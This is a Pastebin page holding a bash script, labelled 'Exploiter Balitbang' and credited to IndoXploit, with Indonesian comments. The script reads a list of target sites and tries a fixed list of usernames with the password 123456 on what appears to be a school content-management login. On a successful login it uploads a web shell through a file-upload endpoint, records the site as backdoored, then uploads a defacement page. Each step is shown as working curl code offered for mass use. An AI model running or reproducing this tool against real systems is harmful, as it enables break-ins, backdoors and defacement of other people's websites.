Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- CookieD=cookie.txt
- cek(){
- path="/member/index.php"
- path2="/member/ajax_login.php"
- path3="/functions/simmateriguru.php"
- path4="/materi/file.php"
- path5="/k.php"
- site=${target}${path}
- site2=${target}${path2}
- site3=${target}${path3}
- site4=${target}${path4}
- site5=${target}${path5}
- curl --silent --max-time 60 --connect-timeout 50 "$site" | grep -i "login" >/dev/null;asa=$?
- if [ $asa -eq 0 ];then
- echo ""
- echo -e "\033[1;32m# $target <= gw brute dulu ya..\E[0m"
- bruteforce
- else
- echo ""
- echo -e "\033[1;31m# $target <= ngk vuln\E[0m"
- fi
- }
- bruteforce(){
- for brute in kepsek masjava taufik tomi alan siswanto wardjana kickdody choirulyogya alumni hafidz 070810120 farhan
- do
- curl --cookie $CookieD --cookie-jar \
- $CookieD --silent $site2 \
- --data "user_name=$brute&password=123456" -o ckck.txt
- cek2
- done
- }
- cek2(){
- cat ckck.txt | grep -i "yes" >/dev/null;wow2=$?
- if [ $wow2 -eq 0 ];then
- echo -e "\033[1;32m# $site <= $brute | 123456\E[0m"
- ng
- else
- echo -e "\033[1;31m# $brute <= bukan ini\E[0m"
- fi
- }
- ng(){
- echo "# Lgi coba upload Shell"
- curl --silent --cookie $CookieD --max-time 10 --connect-timeout 10 -o ckck.txt \
- -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
- -F "file=@${uploader}" \
- --request POST "$site3"
- cek3
- }
- cek3(){
- curl --cookie $CookieD --silent --max-time 60 --connect-timeout 50 "$site4" | grep -i "ganteng" >/dev/null;wow3=$?
- if [ $wow3 -eq 0 ];then
- echo -e "\033[1;35m# $site4 <= berhasil nanem Shell\E[0m"
- echo "$site4 <= Backdoored" >> Deface.txt
- uploadDeface
- else
- echo -e "\033[1;31m# $target <= ngk berhasil Shell\E[0m"
- break
- fi
- }
- uploadDeface(){
- echo "# lgi pengen nge-deface..."
- curl --silent --cookie $CookieD --max-time 10 --connect-timeout 10 -o ckck.txt \
- -F "file3=@${scriptdeface}" \
- --request POST "$site4"
- cek4
- }
- cek4(){
- curl --silent --max-time 60 --connect-timeout 50 "$site5" | grep -i "Hacked" >/dev/null;wow4=$?
- if [ $wow4 -eq 0 ];then
- echo -e "\033[1;32m# $site5 <= Defaced\E[0m"
- echo "$site5 <= Defaced" >> Deface.txt
- echo "nb: Jangan buka shell klo ngk mau file pepesan ilang"
- echo ""
- break
- else
- echo -e "\033[1;31m# $target <= ngk berhasil Nge-Deface\E[0m"
- `rm ckck.txt`
- break
- fi
- }
- echo "# Exploiter Balitbang"
- echo -e "# \033[1;32mIndoXploit\E[0m"
- echo -e "# thx to: \033[1;31mSohai\E[0m | \033[1;34mHacker-Newbie.org\E[0m | You"
- echo " "
- read -p "Masukan List Target: " Target
- if [ ! -f $Target ];then
- echo "File ${Target} Tidak Ada.. "
- exit
- fi
- read -p "Masukan Shell: " uploader
- if [ ! -f $uploader ];then
- echo "Shell Tidak Ada"
- exit
- fi
- read -p "Masukan Script Deface: " scriptdeface
- if [ ! -f $scriptdeface ];then
- echo "Script Deface Tidak Ada"
- exit
- fi
- echo " "
- echo -e "\033[1;34m# Wait.."
- for target in `cat $Target`
- do
- cek
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement